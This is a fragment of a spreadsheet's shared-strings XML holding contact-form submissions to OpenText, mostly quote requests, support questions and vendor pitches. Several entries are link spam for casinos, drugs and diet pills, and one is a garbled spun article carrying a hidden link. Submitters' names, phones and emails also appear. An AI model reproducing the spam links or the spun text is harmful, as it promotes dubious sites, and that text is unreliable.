    <t>casino online _x000D_
[url=http://casinoline17.com/]casino games[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinoline17.com/]real money casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>Fax number isn't connecting to client.</t>
  </si>
  <si>
    <t>Faxing to client fax #814-474-9301 and it just says busy. When we try to call the client fax # we get a DEDU noise. When we call the client phone its a busy signal. Client has Hagaan business associate in and they determined nothing is wrong with their fax. They are getting faxes from outside Dr's and vendors.</t>
  </si>
  <si>
    <t>We are looking to bring in a new knowledge base for about 1000 employees, OpenText was recommended, I'd love to talk with someone and set up a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a software company who provides SaaS offerings to commercial real estate companies. We would like to learn more about the options for using your solution as an embedded or OEM solution for our subscribers: pricing, capabilities, etc. </t>
  </si>
  <si>
    <t>We have just purchased RIghtFAX OpenText Order #8000013913/20831 PO Number: 1010000209  and need to know what Customer Support Contract number is.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">How do I get pricing for Redact-it/Blazon?  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am in IT and have been tasked with  going through and reviewing our software versions and wanted to see what the latest version of RightFax?  I see our catalog showing 10.6 Feature Pack 3._x000D_
_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Non-technical question about Alchemy Server.   Some links to Document Server, Alchemy Edition lead to RightFax page.  I want some information on the latest version of Alchemy and upgrade paths from Version 9.0 (Build 200.203)</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please send your EOL support matrix for the Host Explorer product.  </t>
  </si>
  <si>
    <t xml:space="preserve">Agredeceré de su contacto para conocer los servicios que ofrecen en especial respecto a servicios B2B EDI._x000D_
De antemano gracias._x000D_
Saludos. </t>
  </si>
  <si>
    <t>Sir mai sis security 8 year working job kiya abhi regination 1 before kiya grachuity abhi tak nahi mila hai</t>
  </si>
  <si>
    <t>Need information on eDOCS 16.3 features compared to older version of eDOCS.</t>
  </si>
  <si>
    <t>I want to learn more about whether OpenText eDocs DM is a good fit for in-house legal department, and I am seeking price information for possible budget addition. I strongly prefer email communication. Thank you.</t>
  </si>
  <si>
    <t>Ready to do business with Kmart and they require we have a 3rd party catalog.  So, I am just touching base.</t>
  </si>
  <si>
    <t>casino online loc us _x000D_
[url=http://casinoline17.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
online casino no deposit bonus</t>
  </si>
  <si>
    <t>Hi, _x000D_
It has been awhile since we have a check about an ongoing problem we are having. Rightfax continues to change the print driver to something different at times. This can happen to a worker every week or it can go a couple weeks before it happens but the only way to correct it is to send an IT Tech to the workers PC and manually change it. However, it will happen again. We were told a few years about that after we moved to the newest version of Rightfax and had all of our PCs on Windows 7 this would not be an issue any longer but this has not been the case. _x000D_
What are our options to permanently fix the Rightfax driver so it does not jump over to another print driver?  We have other software that uses specific print drivers and never have this issue of it changing to something it is not supposed to be. I can be reached at the number listed if we need to discuss this. thanks</t>
  </si>
  <si>
    <t>Issues with the users File Plan. Please contact 212-441-6632</t>
  </si>
  <si>
    <t>Maintenance quote</t>
  </si>
  <si>
    <t>We are doing a POC on an evaluation copy of your NFS Solo product with AWS EFS.  We've had good luck attaching EFS to Windows Server 2012 R2, but would like to purchase help in completing this POC.  In particular we need help in determining what, if any, capability there is to use Active Directory for authentication/authorization.  Your documentation implies this should work, but we've been unable to do this._x000D_
_x000D_
We should point out we do not have a lot of experience with NFS, and so, this is probably the basis of our problems._x000D_
_x000D_
Any help that you can offer would be greatly appreciated.  And again, we are certainly willing to engage with your professional services to complete this evaluation._x000D_
_x000D_
Regards,_x000D_
_x000D_
Blake Borup</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure if this is the correct company. I have been trying to get in contact with this person to ask about a right fax quote:  Rightfax contact:_x000D_
Ken Rudmose_x000D_
OpenText | Business Networks_x000D_
M 404-295-7007 (NEW number)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Opentext does have a big meeting on 18 april 2018 in de beurs van Berlage in Amsterdam. In the period I worked at Philips I worked with Opentext. I'am still professional interested in Opentext as company and as Professional in the product of Opentext. Do i need to buy an entrance ticket in my case ? Looking forward to your response . Best regards Jacob van der Kooi </t>
  </si>
  <si>
    <t>Client is interested in exploring server fax solution due to volume of inbound and outbound faxes being caught in queue of an analog line.  Solution at this time is time sensitive and I would like to know what information would be needed from us to be provided a quote for services.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Hope you are the right person to discuss about our updated database of Key IT/Technology decision makers? _x000D_
_x000D_
Business titles include-_x000D_
_x000D_
CTO's, CIO's, Chief Architect, VP/Director/SVP/Application Development, Solutions Architect, Infrastructure Managers, Data Center Owners/Manager/Directors, Systems Software Manager, Developer, Manager Information Services, Network and Communications Managers, Data Center and Cloud architects, Information Technology Project Manager, Network Manager, VP/Director of IT, IT Manager, Product Management,National co-op leaders, Co-op insiders, Engineering, BI Analysts, BI Architects, Data Analysts and all other key decision makers in the industry who might be looking for-_x000D_
_x000D_
Consultants ,Distributors, Manufacturers, Software Providers, Service Providers whose area of business is Wire, cables, transformers, SCADA, GIS, demand side management, power quality, utility vehicles, construction equipment, telecommunications, Electronics,Information Technology, Communication Technology etc.._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job title :_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Alice Miller</t>
  </si>
  <si>
    <t>Retail compliance - Solution</t>
  </si>
  <si>
    <t>celebrex generic _x000D_
[url=http://hqflagyl2017.com/]flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl&lt;/a&gt; _x000D_
finasteride 5mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
finasteride</t>
  </si>
  <si>
    <t>Information on the ECM solution</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinoline17.com/]best online casino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;play casino games online&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>online casinos for us players _x000D_
[url=http://casinoline17.com/]best online casino games free[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino real money&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t>We are looking for OCR and BarCode implementation solutions for one of our clients for the Invoices, etc. We want understand the product offered by you in this space. _x000D_
_x000D_
We have been trying to contact the local offices in Bangalore, however could not reach the correct contact person. Would appreciate if you would be able to provide us with the information or connect us with the responsible person. _x000D_
_x000D_
This is an urgent requirement from client, would like to hear from you soon._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We would like to discuss on the Automotive Supplier Management Portal provided from Covisint._x000D_
Regards,_x000D_
Arjun Das_x000D_
</t>
  </si>
  <si>
    <t>I would like to know what type of company certificates in open-text related to Documentum and the different type of partnerships that exist.</t>
  </si>
  <si>
    <t>celebrex prices _x000D_
[url=http://hqflagyl2017.com/]flagyl antibiotic[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;buy flagyl online&lt;/a&gt; _x000D_
buy propecia online _x000D_
[url=http://hqvoltaren2017.com/]voltaren tablets[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
buy propecia online</t>
  </si>
  <si>
    <t>A client of mine is interested to purchase your platform and I will assist them with validation._x000D_
My question to relates to the "OpenText Electronic Signatures":_x000D_
1. Is it compliant with FDA 21 CFR Part 11?_x000D_
2. Can you provide a statement of compliance or verification report?_x000D_
_x000D_
Thanks,_x000D_
Shimon</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
We have been paying annual maintenance on Livelink Content Server, Additional Named Users and Object Importer._x000D_
I have been asked to find out what would happen if the maintenance was stopped. Would we still have the right to use our current Livelink installation?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Ablösung der derzeitigen Softwarelösung zur Rechnungsarchivierung in SAP. </t>
  </si>
  <si>
    <t>generic celebrex _x000D_
[url=http://hqflagyl2017.com/]flagyl antibiotic[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl online&lt;/a&gt; _x000D_
buy propecia online _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
finasteride 5mg</t>
  </si>
  <si>
    <t>_x000D_
Hello,_x000D_
I can not access the support page, can you help me?_x000D_
_x000D_
SPIE Communications - EU0270516_x000D_
Contract number: A100191_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Regards,_x000D_
_x000D_
Alexandre Marmaras</t>
  </si>
  <si>
    <t>Dear Open Text Team:_x000D_
_x000D_
_x000D_
Hello and good morning to you._x000D_
_x000D_
I was reminded about Open Text at one of my London workshops (at techUK)._x000D_
I have led several workshops for Open Text in the past. The workshops were very well received by the Open Text delegates who attended. I have even led workshops at Open Text Away Days._x000D_
_x000D_
My workshops are targeted specifically to your sector and so I wanted to get back in touch with you._x000D_
Hence my contact here._x000D_
_x000D_
I offer bespoke English language IT/Technology Presentation Skills workshops that are totally work related and focused, enjoyable, and effective at a reasonable cost._x000D_
_x000D_
It is my purpose, with your kind assistance, to reach the members of your Open Text staff involved in the training and development of your senior management at your Reading offices. I would be grateful for your assistance in this matter and I do thank you._x000D_
_x000D_
I lead Presentation Skills (Personal Impact) and Sales (The Sales Process MOT) Workshops targeted specifically to your sector. I work with both groups and in one-on-one situations._x000D_
_x000D_
Currently, I lead my workshops for such groups as Ford, Sony, Nokia, Citrix, Centre 4 Testing, Royal College of Surgeons, Open Text,  Mayden, Rockwell Collins, UKCeB, NHS Leaders, MOD, Brother UK, The Guardian, Kable, Teradata, Babcock International, Neopost, SAP, Panasonic, and techUK among many others._x000D_
I mention techUK to you, because they represent the interests of the IT/Technology sector within the UK._x000D_
In fact, it was at one of my techUK workshops where I was reminded about Open text._x000D_
_x000D_
I am based in London._x000D_
_x000D_
My workshops have gained a reputation for directly addressing the key issues that IT/Technology groups can often face while presenting or within the sales process._x000D_
For example, such groups now must demonstrate an ability to do well in one-to-one and face-to-face meetings. Another issue that confronts IT/Technology groups in their presentations is the reality that often their audiences are mixed between tec</t>
  </si>
  <si>
    <t>I want to know how it's work network license for Brava dwg viewer (new release next week) ._x000D_
It's floating license, the maximun number of concurrent it's 24?_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We use Documentum platform and I need  to access the product documentation and the support resources freely. Regards </t>
  </si>
  <si>
    <t>I'm a reseller , my customer is asking for Exceed onDemand , remote access from Laptops (Windows based) to Dell Linus workstations. pls help to quote. thank you_x000D_
I'm a reseller.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello EDI Team, _x000D_
_x000D_
I tried to reach r.specter@opentext.com, but I got received the information the the mailadress is not any more valid. _x000D_
_x000D_
I hope you can help me:_x000D_
_x000D_
our provider TELEKOM DEUTSCHLAND will reduce the ISDN- connections soon. _x000D_
_x000D_
Therefore it is necessary to change the EDI connection from OFTP to OFTP2 as soon as possible. _x000D_
_x000D_
we have EDI connections to the GXS- Boxes of JAGUAR and KNORR. _x000D_
_x000D_
also we have an ETO-GXS- box which is connected to DELPHI, GM and NEXTEER. _x000D_
can you help us to change this Connection from ISDN to OFTP2?_x000D_
thanks a lot_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I just want to know the details about Opentext Documentum Certification </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are using BravaReader as viewer for our .tif-files. Because it will not longer be free to use, please send us an offer for 200 licences of Brava! Desktop. _x000D_
_x000D_
Thank you._x000D_
Mit freundlichen Grüßen  Best regards  Meilleures salutations _x000D_
_x000D_
Reto Spinner _x000D_
IT-Support / Client Management _x000D_
Informationstechnologie _x000D_
_x000D_
 _x000D_
_x000D_
DOLL Fahrzeugbau GmbH _x000D_
Industriestr. 13  77728 Oppenau (Germany) _x000D_
Tel.: +49 7804 49-170  Fax: +49 7804 49-7170 _x000D_
E-Mail: Reto.Spinner@doll.eu  Web: www.doll.eu _x000D_
_x000D_
Amtsgericht Berlin-Charlottenburg, HRB 160127 B _x000D_
Geschäftsführung: Markus Ehl _x000D_
</t>
  </si>
  <si>
    <t>Hi _x000D_
Our customer 3DPLM Software is looking to procure_x000D_
·         OpenText Exceed and Exceed 3D –  3 Nos._x000D_
Please share the quote with reseller discounts._x000D_
Regards,_x000D_
Rakesh</t>
  </si>
  <si>
    <t>Dear support, my client Savant Surveys and Strategies is using your Liquid Office software._x000D_
We have a certificate in place for https connection, but most of the certificate checking website indicated CA intermediate certificate chain broken or hasn't been installed properly._x000D_
See below:_x000D_
_x000D_
The certificate is not trusted in all web browsers. You may need to install an Intermediate/chain certificate to link it to a trusted root certificate. Learn more about this error. You can fix this by following DigiCert's Certificate Installation Instructions for your server platform. Pay attention to the parts about Intermediate certificates._x000D_
_x000D_
Liquid office module uses apache tomcat, but unfortunately due to the version of the apache or version of liquid office, we couldn't use normal certificate request, because it doesn't support 2048 key length RSA certificate._x000D_
Therefore, we used to just use IIS to generate and apply certificate, then export certificate as PFX file, then use web.config file to include PFX file path and password. It was working fine till recently, not sure what went wrong._x000D_
I am wondering if you could help me._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like to transfer the software to another computer but I couldn't be able to access to my account or my support in order to request for new key license. Kindly advised what's the procedure need to be done in order to transfer the software to another computer. Thanks</t>
  </si>
  <si>
    <t>sarcoma scientific study reveals chance tallest in southern region local surface area_x000D_
_x000D_
condition bargains doing 1984 seemed to be higher to the top task Viejo, Dana item, Laguna Niguel, Costa Mesa, Tustin, Newport beach as well as,while Placentia than consist of Orange nation communities, based on first year results within your precedent positioning pisces exploration announced mondy._x000D_
_x000D_
professionals, that spoken people can't teach you the behaviours getting additionally figures, will also asserted that plus cancer of the gastrointestinal system, Lung as chest enlargement turned out to be the actual contained in the region with regard to 1984, A on top of normal prevalence of cancerous most cancers a harsh shape of skin cancer ended up being determined, even more so down the seacoast._x000D_
_x000D_
the cancer surveillance program at Orange region charted 5,979 occasions just our age, copulation, ethnic ensemble, multi-level and furthermore type of sarcoma, but it will be the model to enjoy a state-wide tumor pc in the next few years._x000D_
_x000D_
those first year documents as a result of Orange regional increases whole lot important questions when it comes to it gives you tips, expressed process director Hoda Anton Guirgis, Vice chairs involved with UC Irvine's dept free community with green medical treatment._x000D_
_x000D_
"when this happens, every single bought is just commemorate on the curve. We have to see the the next time we'll [url=https://plus.google.com/+LatamDateReview]latamdate review[/url] and subsequently year" in front of sketching final thoughts, Anton Guirgis stated. up to now, your girlfriend asserted, analysis essential starting this explanations entirely on death trials which can be, tumor demise._x000D_
_x000D_
Under the application, every one of doctors' staff rooms, clinics furthermore doctor's offices had been forced to complain of newly purchased conclusions at tumors. Anton Guirgis said on the internet total conformity._x000D_
_x000D_
in line with the data, Orange County's in summary a cancer</t>
  </si>
  <si>
    <t>Need information on how to download cumulative patch 25</t>
  </si>
  <si>
    <t>We used to be a customer with EMC Documentum._x000D_
_x000D_
We'd like to see and down the Captiva Cloud Toolkit on a project we have._x000D_
_x000D_
Please let us know asap.  We have an existing solution with a long term customer than need scanning added to it.  We are ready._x000D_
_x000D_
Thank you in advance.  Feel free to call me on my mobile: 847-275-9366.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
As we are looking to migrate to a new edm system very soon, please provide us a quotation based on the following requirements._x000D_
_x000D_
- Automation features to send out emails for welcome letters and etc. to clients_x000D_
- Ability to have different client segment mailing lists _x000D_
- Ability to edit the edm via templates mode instead of simply HTML _x000D_
- B2C cloud system (if required for automation features)_x000D_
- Analytics for each send out_x000D_
- Support from team for technical and other issues _x000D_
- Able to send out up to 100,000 contacts and 4,800,000 emails annually _x000D_
_x000D_
Please also include other necessary and miscellaneous costs such as training fees, implementation fee, account setup and etc. in the quotation._x000D_
Further, please advise how many accounts/users are we given for such a package. _x000D_
_x000D_
Lastly, would like to know how quickly will the unsubscribe list be updated?_x000D_
_x000D_
Feel free to drop me a call if you need further clarification._x000D_
_x000D_
Hear from you soon, thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern, _x000D_
_x000D_
We are working on setting up EDI. _x000D_
I have been told utilising a product you have available that installs on our server and allows us to more easily talk to that product.  _x000D_
It then does the translation and communication using the relevant EDI standards. _x000D_
I will like to further discuss this with someone and the costs involved. _x000D_
_x000D_
Thanks,  </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I would like to speak to someone regarding OpenText iHub Server (BIRT commercial version) for use in the NTG. _x000D_
_x000D_
Thanks, _x000D_
Shane </t>
  </si>
  <si>
    <t>I would like to get information on the level of customization that can be accomplished when creating microsites using the Digital Hub.  We are looking to replace our custom DAM and Customer portal with Open Text Media Manager, and it appears that the micro sites could replace our customer portal.  _x000D_
In addition, we are really interesting to see if the sites support user registration, user groups and setting access to assets based on user groups.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello!_x000D_
_x000D_
My name is Allie from Caliber Home Loans, I have a verification of employment request for an employee and am wondering where I send that to be completed? If you can help me out at all with this it would be very much appreciated. I've already sent it to hr@opentext.com_x000D_
_x000D_
Thank you so much! _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We just received our quote for ongoing maintenance support and want to verify that each line items is what we think._x000D_
We believe this is for the Sandbox region, can you confirm?_x000D_
Kazeon/DocScie/Leap Protect anytime._x000D_
Serial # 1000023366_x000D_
Contract#: 505ENT-M16-VARSOFTWARE-03_x000D_
_x000D_
Thanks,_x000D_
Raquel</t>
  </si>
  <si>
    <t xml:space="preserve">Want to try the eFax. </t>
  </si>
  <si>
    <t xml:space="preserve">Trade shows and industry events are right around the corner and being an exhibitor there, you can be like everyone else, or you  stand out, thereby increasing product awareness and your customer base.  _x000D_
_x000D_
We are PopShap.Com.  We specialize in interactive touch screen kiosks and other digital displays. _x000D_
_x000D_
Let us help make your booth a focal point of the show, not just another exhibit. Personalized content to draw attendees to your booth, not just to let them be passerby. In addition, with our interactive content you can capture leads on the spot while using our innovative software to interact with your potential clients. Show off your products, have industry related trivia and give aways, engage and interact!_x000D_
_x000D_
Our trade show kiosk packages start at $750/kiosk._x000D_
_x000D_
Kindly take a look at our website www.popshap.com and call us today for more information._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">STEINMART WEBINAR was a webimar about attributes and images initiative on 1/24 that i was not able to attend, where can i find this recorded webinar?_x000D_
Regards;_x000D_
Edgar._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>celebrex 200 mg _x000D_
[url=http://hqflagyl2017.com/]flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;buy flagyl online&lt;/a&gt; _x000D_
finasteride 5mg _x000D_
[url=http://hqvoltaren2017.com/]voltaren 50 mg[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
propecia</t>
  </si>
  <si>
    <t>online gambling sites for real money _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online gambling sites for real money&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>Are there any onsite Opentext Teamsite 16.3 courses coming up this spring/summer in the United States?_x000D_
_x000D_
Thanks_x000D_
_x000D_
-Mike</t>
  </si>
  <si>
    <t xml:space="preserve">What is the process for requesting quotes for opentext products, with Dell being the reseller? </t>
  </si>
  <si>
    <t>We are looking to offer new ECM solutions to our clients.</t>
  </si>
  <si>
    <t>Good morning_x000D_
_x000D_
Our company is interested in migrating its Oracle Forms applications to Oracle ADF.</t>
  </si>
  <si>
    <t>Please could you contact me as soon as possible to discuss possible VIM integration with SAP GRC NFe? Thank you</t>
  </si>
  <si>
    <t>I need to get a renewal quote for one of my customers.</t>
  </si>
  <si>
    <t>We would like to set up a virtual demo for your content ecosystem platform ASAP. can you please email me (danielle.crary@dhgllp.com) to discuss possible dates and times within the next week? thank you!</t>
  </si>
  <si>
    <t>top diet pills _x000D_
[url=http://regimenforfeit.com/]diet pills that work[/url] _x000D_
&lt;a href="http://regimenforfeit.com/"&gt;diet supplements that work&lt;/a&gt; _x000D_
prescription weight loss medication</t>
  </si>
  <si>
    <t xml:space="preserve">Hello we use GXS fr our catalog, is Open text the same thing. i have a customer Stein Mart inquiring about open text but i am not sure what this is. </t>
  </si>
  <si>
    <t>Just a quick question. Is your cloud base service HIPAA Compliant?</t>
  </si>
  <si>
    <t xml:space="preserve">Need further product info on Composer for Lotus notes. Please have your product specialist call me. </t>
  </si>
  <si>
    <t>I have an opportunity for a RMS system for a fire department in Texas.  I would like to speak with a sales engineer to determine if your company is a fit for this request.  If so, I would like to determine how we can partner together to respond to the request.</t>
  </si>
  <si>
    <t xml:space="preserve">Helo,_x000D_
I'd like to have more information about  StreamServe Design Center._x000D_
We actually have installed v5.4.0.941 and for what I know so far is not compatible with windows 10. What's your remediation plan? we should buy a latest version? if so, how much it costs?_x000D_
Thanks_x000D_
tania_x000D_
 </t>
  </si>
  <si>
    <t>Please send a quotation for OpenText Gupta Team Developer and OpenText Gupta TD Mobile_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was checking available certification exams for xECM for SAP solutions, i have found this one:  Extended ECM for SAP Solutions Foundation v16, but on prerequisites says:"Candidates must hold an existing Extended ECM for SAP Solutions Foundation Certification for a release prior to v16" . I have checked other certification for prior versions ( v10) but also asks for the same prerequisite, could you provide me with the proper certification exam to begin with?_x000D_
_x000D_
Thanks in advance,_x000D_
Ferran</t>
  </si>
  <si>
    <t>I work for "The Norwegian Public Roads Administration" and we are considering different analytics options and as a preliminary evaluation of the market I would like to get a quote for an installation of OpenText Analytics Suite. What are the costs? Are they per user? Pr. Server core and so on. I hope to get an example from you shortly. _x000D_
Regards, Jon Leirdal</t>
  </si>
  <si>
    <t>Does eDOCS have a cloud-based platform?</t>
  </si>
  <si>
    <t>AUP violation for spam from one of your clients. Projectread.com sent me an unsolicited marketing email via the easylink portal.  I have no prior relationship with the company and did not opt-in to the email.  I can provide additional information including email headers if needed.  Please remedy this situation or forward to the appropriate person.  I was unable to find an email to send abuse complaints. Thank you.</t>
  </si>
  <si>
    <t>Hello, I have had an account for a very long time and would like to cancel. Please help.</t>
  </si>
  <si>
    <t>I have been trying to register to download the demo of redact-it however the email never comes through, I've check spam and quarantine and there is not email. Are you bale to email the download directly please? _x000D_
Thanks.</t>
  </si>
  <si>
    <t>casino casino _x000D_
[url=http://casinobablogames.com/]casino online for fun[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;slot online&lt;/a&gt; _x000D_
online casino no deposit bonus</t>
  </si>
  <si>
    <t>After filling in one of these forms yesterday, your site produced a page of telephone numbers by country, which stated that one of your operatives would "contact me shortly". 24 hours later, and that hasn't happened. I've tried telephoning but your system diverts to an audio message recorder only. Would you contact me, please on 01273-252940 or 07917 795067. Thank you. Rob Kemsley</t>
  </si>
  <si>
    <t>Hello Open Text Team,_x000D_
 _x000D_
This is shaik from Thomson Reuters Estore Team. Currently we need your help here to modify the functionality of the Robocopy jobs operation that are present in  the Teamsite ._x000D_
 _x000D_
I am based in INDIA and my shift timings would be 11AM IST to 9 PM IST and my contact number is 9490889381._x000D_
 _x000D_
So we Request your help here to log a ticket related to this issue .Please get back to us in case of any information needed._x000D_
 _x000D_
Hoping for a quick response.</t>
  </si>
  <si>
    <t>celebrex 200 mg _x000D_
[url=http://hqflagyl2017.com/]buy flagyl online[/url] _x000D_
&lt;a href="http://hqflagyl2017.com/"&gt;flagyl antibiotic&lt;/a&gt; _x000D_
propecia _x000D_
[url=http://hqvoltaren2017.com/]voltaren[/url] _x000D_
&lt;a href="http://hqvoltaren2017.com/"&gt;voltaren 100 mg&lt;/a&gt; _x000D_
finasteride 5mg</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Please provide necessary for my account "Thotamsetty_V@infosys.com"._x000D_
PFB details._x000D_
Nickname: Ministry of Corporate Affairs_x000D_
Account Name: Ministry of Corporate Affairs_x000D_
End user Code: EU0181535_x000D_
Please let us know if you still need any details from my end._x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">I have 2 clarifications that I need from OpenText SA_x000D_
a. Here at Ithala, we have implemented various ECM projects using Opentext, and my question is; is it possible to do our software licence renewal direct to Opentext instead of being done thru the Service Provider/ Business partner._x000D_
b. I need a list of all accredited service providers in South Africa that are eligible to implement OpenText as well as their accreditation levels (i.e. Platinum, silver, gold, etc.) That will greatly assist Ithala when engaging in the selection process of the Service Provider._x000D_
Thanks, I will await your response. </t>
  </si>
  <si>
    <t>Einer unserer SAP Kunden setzt die ECM Lösung (Livelink) von Opentext ein. Heute wird diese auf einer EMC Centera Plattform betrieben. Diese soll nun abgelöst werden. Welche Storage Plattformen werden heute von Opentext offiziell unterstützt? Gibt es dazu eine Liste?_x000D_
Besten Dank für Ihr Feedback</t>
  </si>
  <si>
    <t xml:space="preserve">kaiyuam3456_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">123456789_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we used to login to GuptaTechnologies.com for downloading TD related binaries and patches. We need to retrive Gupta TD 6.3 SP but our credentials seems not working right now. I just recreated a new sistemisti@copernicopaghe.it account, but cannot access to the download center._x000D_
_x000D_
Can we ask for support please (company Copernico Paghe SRL)_x000D_
_x000D_
Kind regards,_x000D_
Alessandro Mulas</t>
  </si>
  <si>
    <t>I am running for Roche an evaluation of tools for extracting text from handwritten documents. I would like to evaluate different solutions for ICR - Intelligent Character Recognition - and your company is offering one._x000D_
_x000D_
How can I test your solution for ICR on a few sample documents?_x000D_
Can you grant me limited access to the API for evaluation purposes?_x000D_
_x000D_
If not, what are any other options to test the solution?</t>
  </si>
  <si>
    <t>I am in the process of updating our Supplier database to ensure we have the correct details. _x000D_
_x000D_
Please can you confirm who is the best point of contact for any contract negotiations and provide us with their contact email address and phone number as well as the information below?_x000D_
_x000D_
Company web address_x000D_
Main site contact number_x000D_
Main site email address_x000D_
Main site building address_x000D_
_x000D_
Many thanks for your help.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We have recently purchased 10x licenses for  Brava! Desktop TX-N but we are unable to get access to the download page. Kindly investigate why we do not have access to this ressource. _x000D_
Software ID : Software ID: AEC72E31D46A41F2BAEF19A4F4609013_x000D_
Thanks. _x000D_
_x000D_
Brdgs_x000D_
Daniel Grønnemose_x000D_
Systemadministrator_x000D_
LIFA A/S</t>
  </si>
  <si>
    <t>I want to enquire about Security Risk Management Diploma course</t>
  </si>
  <si>
    <t>Hi_x000D_
 i would to be informed if you can provide me with information concerning a 5 days Class Room Documentum D2 Training in UK_x000D_
Best Regards</t>
  </si>
  <si>
    <t>I am an independent Documentum consultant and for a client am investigating high-performance, flexible and lightweight document viewer for their xCP 2.2 application._x000D_
_x000D_
There are a few questions which if you could answer would tremendously help in the investigation:_x000D_
_x000D_
    Annotations: Are annotations stored in Documentum repository? Would they be retrieved by the xCP OOTB Rest service API, that is http://&lt;hostname&gt;/&lt;AppName&gt;/contents/dm_document/&lt;document-r_object_id&gt;/comments?inline=true_x000D_
_x000D_
    Text content: In addition to images being displayed for a document in viewer is the text content also available? That is, can I copy text from the Brava viewer of a rendered document (especially MS Word documents)._x000D_
_x000D_
    Image storage: Where are the generated images stored? For how long are they stored/cached? What is the CTQ for displaying any page?_x000D_
_x000D_
    Use in custom widget code: Is it possible to use Brava viewer in custom xCP widgets that is developed? For example, what would be the equivalent xCP Content Viewer code for Brava viewer?_x000D_
_x000D_
    var viewerDefinition = {_x000D_
      "xtype": "xcp_viewer",_x000D_
      "ann": true, // Enable annotations_x000D_
      "man": true, // Enable editing annotations_x000D_
      "prn": true, // Enable print buttons_x000D_
      "thm": false, // Disable thumbnail panel_x000D_
      "mdc": false, // Disable modify content_x000D_
      "disableFocusOnLoad": true,_x000D_
      "height": 720,_x000D_
      "margin": "0 0 0 0",_x000D_
      "objectId": objectId,_x000D_
      "contentType": contentType,_x000D_
      "objectUri": this.generateObjectUri(objectId)_x000D_
    }_x000D_
_x000D_
     Brava viewer configuration/customization: Can we customize the number of options provided for Print and Download? Also, is it possible to add "Copy" text option?</t>
  </si>
  <si>
    <t>We are looking for Documentum Software for Document Management System for Our Organisation OGH Business Unit.  Please contact immediately.</t>
  </si>
  <si>
    <t>We are developing and supporting Captiva product for our client. So we need the full access of Captiva product.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We are currently using Metastorm 7.6 version. Wanted to know if we can continue with this for another 3 years?_x000D_
_x000D_
Please get back to us._x000D_
_x000D_
Regards,_x000D_
Arun</t>
  </si>
  <si>
    <t>'Don't be described as a stereotype'_x000D_
_x000D_
